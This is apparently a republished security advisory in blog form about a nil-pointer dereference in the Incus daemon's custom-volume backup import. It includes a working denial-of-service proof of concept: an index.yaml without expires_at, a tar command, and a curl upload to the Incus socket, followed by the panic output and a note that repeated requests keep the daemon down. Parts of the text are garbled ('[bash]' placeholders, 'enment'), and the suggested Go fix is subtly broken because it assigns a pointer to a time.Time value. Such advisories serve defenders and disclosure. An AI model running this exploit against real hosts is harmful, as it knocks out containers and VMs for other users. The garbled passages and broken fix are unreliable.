Listen to this Post
The vulnerability exists in the `(backend).CreateCustomVolumeFromBackup` function within internal/server/storage/backend.go. This function processes imported custom-volume backups and is responsible for creating volume snapshots from the backup metadata. The flaw lies in an unguarded dereference of the `ExpiresAt` field, which is a `time.Time` pointer, for each volume-snapshot entry in the backup index.
During the import process, the function iterates over srcBackup.Config.VolumeSnapshots. A prior fix for a related issue (GHSA-r7w7-mmxr-47r9) added a `if s == nil` check at the top of the loop to guard against nil snapshot pointers. However, this check does not protect against a nil `ExpiresAt` field within a non-nil snapshot struct. Approximately 19 lines later, the code directly dereferences `snapshot.ExpiresAt` without verifying that the pointer is non-nil.
An attacker can exploit this by creating a backup tarball containing an `index.yaml` file where the `volume_snapshots` entry omits the `expires_at` field. When this tarball is uploaded via the REST API endpoint POST /1.0/storage-pools/<pool>/volumes/custom, the daemon parses the YAML, and the `CreateCustomVolumeFromBackup` function proceeds to dereference the nil `ExpiresAt` pointer. This triggers a runtime panic with a segmentation violation, crashing the entire `incusd` process.
The crash results in a denial of service, aborting all ongoing container, VM, and storage operations on the host. In a clustered environment, the impact extends to the entire cluster member. The attack requires only that the user has the `can_create_storage_volumes` permission on any project, which is not limited to administrative users. The vulnerability is a sibling-field variant of CVE-2026-40197, and the affected code path lacks the nil-check that is present in other consumers of the same field within the file.
DailyCVE Form:
Platform: Incus
Version: 7.0.0, 6.0.x
Vulnerability: Nil-Pointer Dereference
Severity: Medium (CVSS 6.5)
date: 2026-06-26
Prediction: 2026-07-10
What Undercode Say:
Analysis of the vulnerability reveals an asymmetric guard pattern. While other functions such as `CreateInstanceFromBackup` and the migration path correctly check `snapshot.ExpiresAt` for nil before dereferencing, the `CreateCustomVolumeFromBackup` function misses this check. The following bash commands and code snippets demonstrate the issue:
Create a minimal backup tarball with missing expires_at
cat > index.yaml <<EOF
name: poc-vol
backend: dir
pool: default
type: custom
optimized: false
optimized_header: false
snapshots: [bash]
config:
volume: {name: poc-vol, type: custom, content_type: filesystem, config: {}}
volume_snapshots:
- name: snap0
description: snap0
config: {}
EOF
tar -czf poc-vol.tar.gz index.yaml
Upload the malicious backup to trigger the crash
curl -s --unix-socket /var/lib/incus/unix.socket -X POST \
--data-binary @poc-vol.tar.gz \
-H 'Content-Type: application/octet-stream' \
-H 'X-Incus-name: poc-vol' \
http://incus/1.0/storage-pools/default/volumes/custom
The daemon panic output confirms the crash:
panic: runtime error: invalid memory address or nil pointer dereference [signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x162b938] goroutine 422 [bash]: github.com/lxc/incus/v7/internal/server/storage.(backend).CreateCustomVolumeFromBackup(...) /build/incus/internal/server/storage/backend.go:7731 +0xb48
The vulnerable code at `backend.go:7731` directly dereferences `snapshot.ExpiresAt` without a nil-check:
err = VolumeDBCreate(b, srcBackup.Project, fullSnapName, snapshot.Description, snapVol.Type(), true, snapVol.Config(), snapshot.CreatedAt, snapshot.ExpiresAt, // <-- panics when expires_at omitted snapVol.ContentType(), true, true)
Exploit:
An authenticated attacker with the `can_create_storage_volumes` enment on any project can exploit this vulnerability. The attacker crafts a backup tarball with an `index.yaml` file that includes a `volume_snapshots` entry lacking the `expires_at` field. The tarball is then uploaded to the Incus REST API endpoint using a POST request with `Content-Type: application/octet-stream` and the `X-Incus-name` header. Upon processing, the daemon panics and crashes, leading to a denial of service. Repeated requests can maintain the crash state, requiring manual operator intervention to restart the daemon.
Protection:
The immediate protection is to apply the suggested fix, which mirrors the nil-check pattern already used in other parts of the codebase. The fix involves adding a guard before dereferencing snapshot.ExpiresAt:
var snapExpiryDate time.Time
if snapshot.ExpiresAt != nil {
snapExpiryDate = snapshot.ExpiresAt
}
err = VolumeDBCreate(b, srcBackup.Project, fullSnapName, snapshot.Description,
snapVol.Type(), true, snapVol.Config(), snapshot.CreatedAt,
snapExpiryDate, snapVol.ContentType(), true, true)
Until the patch is applied, administrators can mitigate the risk by restricting the `can_create_storage_volumes` permission to only trusted users and monitoring for unusual backup upload activities. Upgrading to a patched version once available is the recommended long-term solution.
Impact:
- Denial of Service: Successful exploitation crashes the entire `incusd` process, aborting all container, VM, and storage operations on the host. In clustered setups, the impact affects the entire cluster member.
- Privileges Required: Low – any authenticated user with `can_create_storage_volumes` on any project can trigger the crash. This permission is not restricted to administrative users.
- Network Attack Surface: The vulnerability is exploitable over the Incus REST API, which is typically exposed on TCP port 8443 or via the Unix socket.
- CWE-476: Nil-Pointer Dereference. The CVSS score is estimated at 6.5 (Medium) with the vector AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
